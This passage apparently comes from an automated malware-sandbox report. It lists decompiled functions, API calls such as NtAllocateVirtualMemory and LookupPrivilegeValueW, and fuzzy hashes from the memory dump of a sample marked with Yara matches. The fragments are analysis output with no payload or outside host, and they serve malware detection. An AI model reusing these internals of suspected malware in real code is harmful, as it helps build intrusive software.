				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                      0x0041879f
                                                                      0x004187a7
                                                                      0x004187c9
                                                                      0x004187cd

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419384,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction ID: dde6359f0c5cf0f3b7cc61d53361d99b03a052e7ad6e115d9fdbfc5a6ee34577
                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction Fuzzy Hash: C2F015B2200208ABDB14DF89CC81EEB77ADAF88754F158149FE0997241C630F810CBE4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004186E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004186E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191B0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                      0x004186e3
                                                                      0x004186e6
                                                                      0x004186ef
                                                                      0x004186f7
                                                                      0x00418705
                                                                      0x00418709

                                                                      APIs
                                                                      • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418705
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction ID: cde372c9834ecde76929cfdbc6e84a5308d085747d856cc7173a1988eed98478
                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction Fuzzy Hash: 23D012752002147BD710EB99CC45ED7776DEF44750F154459BA195B242C530F94086E4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 25afffe72521d28b4007e715134bc6c20f47cbfe06c74e166365dbb6af139879
                                                                      • Instruction ID: 3e3eb30c84c1f52af5b5bcfee0fd4074d807672661d225df099459ff4fafb94d
                                                                      • Opcode Fuzzy Hash: 25afffe72521d28b4007e715134bc6c20f47cbfe06c74e166365dbb6af139879
                                                                      • Instruction Fuzzy Hash: 869002B124100402D544719955047460005A7D0341F51C015A5055558EC7998DD576A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7b4cdda2aa31ff7b28b52f83b4441c6897ed54cddb45e6f9f085163f6334c765
                                                                      • Instruction ID: 51cbe4d735e5660d05b78bc75e42dd72d371dc90a73732495ed7fd3ee60755be
                                                                      • Opcode Fuzzy Hash: 7b4cdda2aa31ff7b28b52f83b4441c6897ed54cddb45e6f9f085163f6334c765
                                                                      • Instruction Fuzzy Hash: 3990047535100003050DF5DD17045070047F7D53D1751C035F1007554CD771CC717171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: fd2849c5b28d2fe08e2d5d1d3b9c61c0adaa077730aa1d02a6aa1dc9354a3baa
                                                                      • Instruction ID: 3efe2f1641941bf64de89da6607a82505fd9c11ac27b9d39a10deb667364824c
                                                                      • Opcode Fuzzy Hash: fd2849c5b28d2fe08e2d5d1d3b9c61c0adaa077730aa1d02a6aa1dc9354a3baa
                                                                      • Instruction Fuzzy Hash: 639002A138100442D50461995514B060005E7E1341F51C019E1055558DC759CC527166
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: bba1b913f83b0d347774db24200788a6c63e5a3e8ea47638b0ba5eaf95ae4264
                                                                      • Instruction ID: 880fad00d18b468f28943e07e1c302c589ba21a345a1c6d24db303e4dc106b79
                                                                      • Opcode Fuzzy Hash: bba1b913f83b0d347774db24200788a6c63e5a3e8ea47638b0ba5eaf95ae4264
                                                                      • Instruction Fuzzy Hash: BA9002A124200003450971995514616400AA7E0241F51C025E1005594DC66588917165
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 4d495e8d81ed6fff5db6538328fa64c1fcdbabe48c9d2e15eda14830ef170b00
                                                                      • Instruction ID: 2015e1de2dcf8862aeb40ce98603afcf36002fe7d69385713d02d9351cc7d1a5
                                                                      • Opcode Fuzzy Hash: 4d495e8d81ed6fff5db6538328fa64c1fcdbabe48c9d2e15eda14830ef170b00
                                                                      • Instruction Fuzzy Hash: BD900261282041525949B19955045074006B7E0281B91C016A1405954CC6669856E661
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 0cf6d1f20dcb04d75c1cf36a96f3a496d67b3e3ce105c9a47c59df17d004b152
                                                                      • Instruction ID: 0a478a90c8f7b48f79563ab7ca2ccf3b327f3f1ff8464402d4574650af89506f
                                                                      • Opcode Fuzzy Hash: 0cf6d1f20dcb04d75c1cf36a96f3a496d67b3e3ce105c9a47c59df17d004b152
                                                                      • Instruction Fuzzy Hash: 8890027124100413D515619956047070009A7D0281F91C416A041555CDD7968952B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: c240a61e67e599136af3cd83fd87e93d15f4150f1ba05aa1097a8deb78143c57
                                                                      • Instruction ID: bb7443d3b8a4bab36aa165f563659b0ac0362f582f4c3e357ecc46f58cb9c9ae
                                                                      • Opcode Fuzzy Hash: c240a61e67e599136af3cd83fd87e93d15f4150f1ba05aa1097a8deb78143c57
                                                                      • Instruction Fuzzy Hash: 4390026164100502D50571995504616000AA7D0281F91C026A1015559ECB658992B171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 463abcdc72f4aa273f6b4bc042aa5e1427bf99d04c3225ffaeb92b46c64c08fb
                                                                      • Instruction ID: 75a5d1fe39f5caccd18e7533e875d42779f42f3fbff8afa5f5c0f19af47615b9
                                                                      • Opcode Fuzzy Hash: 463abcdc72f4aa273f6b4bc042aa5e1427bf99d04c3225ffaeb92b46c64c08fb
                                                                      • Instruction Fuzzy Hash: E390027124100402D50465D965086460005A7E0341F51D015A5015559EC7A588917171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3adcff266a0a34dcf9fe20c75020b3989537fd24a51ab1c4fb854107e5648cb1
                                                                      • Instruction ID: 195b87be7af9acf8de8dd0d743f4cf98dc382f66c6d301deb8004c69dc0fb05f
                                                                      • Opcode Fuzzy Hash: 3adcff266a0a34dcf9fe20c75020b3989537fd24a51ab1c4fb854107e5648cb1
                                                                      • Instruction Fuzzy Hash: 6E90026925300002D5847199650860A0005A7D1242F91D419A000655CCCA5588696361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: edb2401ba6ca458f869534f2cbb0de117f0fcda5590f9b928593ef5375346ae8
                                                                      • Instruction ID: 806f725a1962a95791149125857db1e9728388840d913412224fe160e492fcc8
                                                                      • Opcode Fuzzy Hash: edb2401ba6ca458f869534f2cbb0de117f0fcda5590f9b928593ef5375346ae8
                                                                      • Instruction Fuzzy Hash: 9690026134100003D544719965186064005F7E1341F51D015E0405558CDA5588566262
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f2e44365c29029afd966b843783717fb87e6158fcf48d871702692de503f4675
                                                                      • Instruction ID: d1034e54e1a69311b32554bede4cb6dc2c8d07d78636a3970f0567c6a44bbd6d
                                                                      • Opcode Fuzzy Hash: f2e44365c29029afd966b843783717fb87e6158fcf48d871702692de503f4675
                                                                      • Instruction Fuzzy Hash: E890047135114403D51471DDD5047070005F7D1341F51C415F0C1555CDC7D5CCD17173
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 46b79e64f86b584822b861a1a43bfb918e75882635e2af3a93f66231ee08769a
                                                                      • Instruction ID: 4ebfa688bcad00d8647600a7a8542c7a69021ccc258cba721a4ef32ae78b22fc
                                                                      • Opcode Fuzzy Hash: 46b79e64f86b584822b861a1a43bfb918e75882635e2af3a93f66231ee08769a
                                                                      • Instruction Fuzzy Hash: 4090047134140403D50471DD5D1470F0005F7D0343F51C015F115555DDC775CC5175F1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 02be3722148de88484c93f471f12c5606a30b0e717df6f35e7ad55535652dca3
                                                                      • Instruction ID: 975b14d4e7e12aaed5f3e670bee1b5a01b14a4c3e66c40d9ba17e3d8c6371bcf
                                                                      • Opcode Fuzzy Hash: 02be3722148de88484c93f471f12c5606a30b0e717df6f35e7ad55535652dca3
                                                                      • Instruction Fuzzy Hash: C990026164100042454471A999449064005BBE1251B51C125A0989554DC699886566A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 5704304f54665ef72d697058033ca4d6a8da222083c9ecd11818f69beb11c446
                                                                      • Instruction ID: f0d9774c0c992beafb13d9bc005af59a1634f177555174263d9af74602c06e21
                                                                      • Opcode Fuzzy Hash: 5704304f54665ef72d697058033ca4d6a8da222083c9ecd11818f69beb11c446
                                                                      • Instruction Fuzzy Hash: 9790026125180042D60465A95D14B070005A7D0343F51C119A0145558CCA5588616561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: b723816b3fdc1b4fde7742d0ddccd80721326b263f750328e3a806c5c4212101
                                                                      • Instruction ID: debf293752da3740e2c414ba6c958cfb42b14494e9d43c2f3c2a357d5a53a417
                                                                      • Opcode Fuzzy Hash: b723816b3fdc1b4fde7742d0ddccd80721326b263f750328e3a806c5c4212101
                                                                      • Instruction Fuzzy Hash: 7B90027124100802D5847199550464A0005A7D1341F91C019A0016658DCB558A5977E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f8d3ebe1d624978670917b77af66243fa3e35273b67cc92d9eabef8a2393dcd6
                                                                      • Instruction ID: d3039eee1264bd046ffb3c4e7ad9cab9277b711b649af560c9209be1bf780b6e
                                                                      • Opcode Fuzzy Hash: f8d3ebe1d624978670917b77af66243fa3e35273b67cc92d9eabef8a2393dcd6
                                                                      • Instruction Fuzzy Hash: BD90027124108802D5146199950474A0005A7D0341F55C415A441565CDC7D588917161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
                                                                      • Instruction ID: 2d85129770ae1569db338c81f9331519a7dd6e0895954f6df8c699ab0d1d1ce1
                                                                      • Opcode Fuzzy Hash: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
                                                                      • Instruction Fuzzy Hash: C5212BB2C442085BCB11E6609D42BFF736C9B14304F04017FE989A3181FA38AB498BA7
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418880, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00418880(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191B0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                      0x00418897
                                                                      0x004188a2
                                                                      0x004188ad
                                                                      0x004188b1

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: &5A
                                                                      • API String ID: 1279760036-1617645808
                                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                      • Instruction ID: 4ef14f879dafae0d6951d5bd0a6bbd37283b7ec5dd2ccf2ca50cdce3f5cd3bdb
                                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                      • Instruction Fuzzy Hash: 6CE012B1200208ABDB14EF99CC45EA777ADAF88654F158559FA095B242CA30F910CAF4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004188B2, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 004188ED
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418928
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitFreeHeapProcess
                                                                      • String ID:
                                                                      • API String ID: 1180424539-0
                                                                      • Opcode ID: 712053724ce6fde3dda3dc2c9ff3630cdedbb5a685f270781d41f3608182f818
                                                                      • Instruction ID: e2a99679b142890d3171876c2147a3a0cbfe3255010accf2b4f8d621d631af7b
                                                                      • Opcode Fuzzy Hash: 712053724ce6fde3dda3dc2c9ff3630cdedbb5a685f270781d41f3608182f818
                                                                      • Instruction Fuzzy Hash: 3BF0F0B0200200BFC710DF69CC88EE73BA9EF88320F04864AF9089B312C630E900CAF4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 82%
                                                                      			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A110( &_v67, 0, 0x3f);
				E0041ACF0( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                      0x00407280
                                                                      0x0040728f
                                                                      0x00407293
                                                                      0x0040729e
                                                                      0x004072ae
                                                                      0x004072be
                                                                      0x004072c3
                                                                      0x004072ca
                                                                      0x004072cd
                                                                      0x004072da
                                                                      0x004072dc
                                                                      0x004072de
                                                                      0x004072fb
                                                                      0x004072fb
                                                                      0x00000000
                                                                      0x004072fd
                                                                      0x00407302

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
                                                                      • Instruction ID: 7737b7532069fc333edaf9b0832c3edc759e3be1fb1c5433828103526b109584
                                                                      • Opcode Fuzzy Hash: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
                                                                      • Instruction Fuzzy Hash: 36018431A8022876E721A6959C03FFE776C5B00B55F15416EFF04BA1C2E6A87A0546EA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418A13, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 58%
                                                                      			E00418A13(void* __eax, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				signed int _t8;
				int _t13;
				intOrPtr* _t14;
				void* _t17;
				void* _t20;

				_t8 = __eax - 1;
				if(_t8 > 0) {
					L4:
					return  *_t14(_t8, _t17);
				} else {
					_t8 = _t8 | 0xccd37f06;
					if(_t8 != 0) {
						goto L4;
					} else {
						 *0x8b5535d4 = _t8;
						_t10 = _a4;
						E004191B0(_t20, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
						_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
						return _t13;
					}
				}
			}








                                                                      0x00418a13
                                                                      0x00418a14
                                                                      0x00418a8a
                                                                      0x00418a90
                                                                      0x00418a16
                                                                      0x00418a16
                                                                      0x00418a1b
                                                                      0x00000000
                                                                      0x00418a1d
                                                                      0x00418a1d
                                                                      0x00418a23
                                                                      0x00418a3a
                                                                      0x00418a50
                                                                      0x00418a54
                                                                      0x00418a54
                                                                      0x00418a1b

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A50
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 7b3da62df12b4d5133d59b8203d34cc138ae05f8eed264418d76068305e845be
                                                                      • Instruction ID: ccd63faf6446371bab5f84ecb0f24a74787d440f44f0fba3bef8737164e9a278
                                                                      • Opcode Fuzzy Hash: 7b3da62df12b4d5133d59b8203d34cc138ae05f8eed264418d76068305e845be
                                                                      • Instruction Fuzzy Hash: 2EF082B26402046FDB10DF55DC44EE73769EF85350F04845AF90D97300D935E8508BB4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004188C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 004188ED
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                      • Instruction ID: 8f9b7065ee004bfc107c5e1a3206d22b1dba8f53d1ba42c3d4a522b3320012f0
                                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                      • Instruction Fuzzy Hash: C0E012B1200208ABDB18EF99CC49EA777ADAF88750F018559FA095B242CA30E910CAF4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418A20, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00418A20(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191B0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                      0x00418a3a
                                                                      0x00418a50
                                                                      0x00418a54

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A50
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                      • Instruction ID: 62f155a2f2b834774e03dd9f5cc664d450e5ddbb18d5cf86998e13752e76a9ec
                                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                      • Instruction Fuzzy Hash: 6EE01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0957241CA34E8508BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418928
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction ID: 622c55a551f2a3710ca15f35a1068b8193fa72338b31a42c8a230178039be0f3
                                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction Fuzzy Hash: 3FD012716002147BD620DB99CC85FD777ACDF48750F058065BA1D5B241C531BA00C6E5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 011C967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
